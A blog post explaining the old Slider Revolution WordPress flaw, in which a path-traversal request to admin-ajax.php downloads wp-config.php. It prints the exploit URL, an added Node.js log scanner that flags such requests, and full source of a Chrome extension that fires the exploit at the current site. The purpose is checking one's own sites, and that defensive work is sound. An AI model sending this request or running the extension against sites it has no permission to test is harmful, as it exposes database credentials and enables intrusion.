History
While the Slider Revolution exploit is, at this point, fairly old news, it seems that not everyone got the memo. In a recent post by Wordfence, they claim that the recent Panama Papers fiasco may have begun with a breach of the Mossack Fonseca web server through this exploit.
The agency where I work applied fixes to all of our client sites as soon as the initial news hit, but I have a college friend who recently inherited a number of WordPress websites at his job. After reading the Wordfence article, he realized he didn’t know if any of his new clients had versions of the plugin that would still be vulnerable. Of course the simple answer is “go update all of your plugins”, but since the plugin is baked into the theme in so many cases (and how many made-by-another-developer sites do you have that are all properly child-themed and easy to update?) he couldn’t simply go to his Plugins page on every site to download the new version.
The exploit itself is quite easy to test for: simply use your browser to navigate to admin-ajax.php with the appropriate parameters, and if the site is running a vulnerable copy of the plugin your browser will automatically download the site’s wp-config file.
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
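As an added example that is not part of the original post or the extension, here is a Node.js script that flags that same request pattern in web server access logs (combined log format), wherever WordPress sits under the site root, so a site owner can see whether the file read was ever attempted against them; the log lines are constructed for the example.

```javascript
// Added example (not the post's or the extension's code): flag access-log lines
// carrying the Slider Revolution "revslider_show_image" file-read request at any
// install depth. The sample lines below are constructed for this example.
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Apr/2016:12:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 2815 "-" "Mozilla/5.0"',
  '203.0.113.5 - - [10/Apr/2016:12:00:02 +0000] "GET /wordpress/wp-admin/admin-ajax.php?action=revslider_show_image&img=%2E%2E%2Fwp-config.php HTTP/1.1" 200 2815 "-" "curl/7.47"',
  '198.51.100.7 - - [10/Apr/2016:12:00:03 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=uploads/2016/04/slide1.jpg HTTP/1.1" 200 53120 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [10/Apr/2016:12:00:04 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 31 "-" "Mozilla/5.0"',
];

// Pull client IP, timestamp, method, request path and status out of one line.
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], path: m[4], status: Number(m[5]) };
}

// A request is suspicious when it targets admin-ajax.php (at any depth) with
// action=revslider_show_image and an img value that walks out of the uploads
// tree (".." after percent-decoding) or names wp-config.php directly.
function classifyRequest(path) {
  let url;
  try { url = new URL(path, "http://localhost"); } catch { return null; }
  if (!/\/wp-admin\/admin-ajax\.php$/.test(url.pathname)) return null;
  if (url.searchParams.get("action") !== "revslider_show_image") return null;
  const img = url.searchParams.get("img") || "";
  // searchParams already removed one layer of encoding; decode once more in
  // case the value was double-encoded, keeping the single-decoded form on error.
  let decoded = img;
  try { decoded = decodeURIComponent(img); } catch { /* keep single-decoded */ }
  const traversal = decoded.includes("..") || /wp-config\.php/i.test(decoded);
  const wpRoot = url.pathname.replace(/\/wp-admin\/admin-ajax\.php$/, "") || "/";
  return { wpRoot, img: decoded, traversal };
}

function findRevsliderReads(lines) {
  const hits = [];
  for (const line of lines) {
    const req = parseLine(line);
    if (!req) continue;
    const c = classifyRequest(req.path);
    if (c && c.traversal) hits.push({ ip: req.ip, time: req.time, status: req.status, ...c });
  }
  return hits;
}

// Stand-alone run: print each flagged request as one JSON line.
const HITS = findRevsliderReads(SAMPLE_LOG);
for (const h of HITS) console.log(JSON.stringify(h));
```

A 200 status on a flagged line means the server served something for the request; compare its byte count with the size of the site's wp-config.php to judge whether the file actually went out.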
Solution
What I did to help him out was write a quick Chrome Extension that allowed him to browse to his client sites, click the button, and the extension would attempt to download the `wp-config.php` file from the server. If he got the file, he knew he had a problematic copy of Slider Revolution. If the site responded in any other way, he was likely fine.
The extension was put together in about 15 minutes, and is the first Chrome Extension I’ve written, so it isn’t very fancy. I could have done something other than try to download the file in the browser, so that we could display “success” or “failure” when trying to exploit the site. It also assumes that WordPress lives at the root of the website, since the extension will attempt to access `/wp-admin/` at the root of the domain – if a site has a vulnerable plugin installed but, for example, contains the WordPress installation in the `/wordpress/` directory, this extension will not effectively find the exploitable path.
Download
> Click here to download the extension now
I’m distributing the extension in its “unpacked” state, so that people can review it before use. Since the zip file contains a folder with all of the raw files, you will need to enable Developer Mode in Chrome in order to load the extension if you’d like to use it yourself. Click here for instructions on how to load an unpacked extension in Google Chrome
NOTE: Obviously you use this code at your own risk and for your own purposes. You alone are responsible for your own actions. I cannot be held responsible for anything you do with this extension, or the code/information provided on this page.
Source
You may also view the source code of the `manifest.json` and `background.js` files below, which are the only pieces of code in the whole extension. Enjoy!
{
  "manifest_version": 2,
  "name": "Revolution Slider Checker",
  "description": "This extension will check the current website to see if their Revolution Slider is vulnerable to the known exploit that allows you to download the wp-config.php file",
  "version": "1.0",
  "browser_action": {
    "default_icon": "icon.png",
    "default_title": "Click here to check"
  },
  "background": {
    "scripts": ["background.js"]
  },
  "permissions": [
    "activeTab"
  ]
}
// More info on the Slider Revolution exploit
// https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
chrome.browserAction.onClicked.addListener(function(tab) {
  var uri = tab.url;
  // Reduce the tab's URL to scheme://host[:port], i.e. the root of the domain.
  // regex taken from http://stackoverflow.com/questions/3689423/google-chrome-plugin-how-to-get-domain-from-url-tab-url
  var origin = uri.match(/^[\w-]+:\/{2,}\[?[\w\.:-]+\]?(?::[0-9]*)?/)[0];
  // Navigate the current tab to the admin-ajax.php check URL; a vulnerable copy
  // of the plugin answers with the wp-config.php file as a download.
  chrome.tabs.update(tab.id, {
    url: origin + '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
  });
});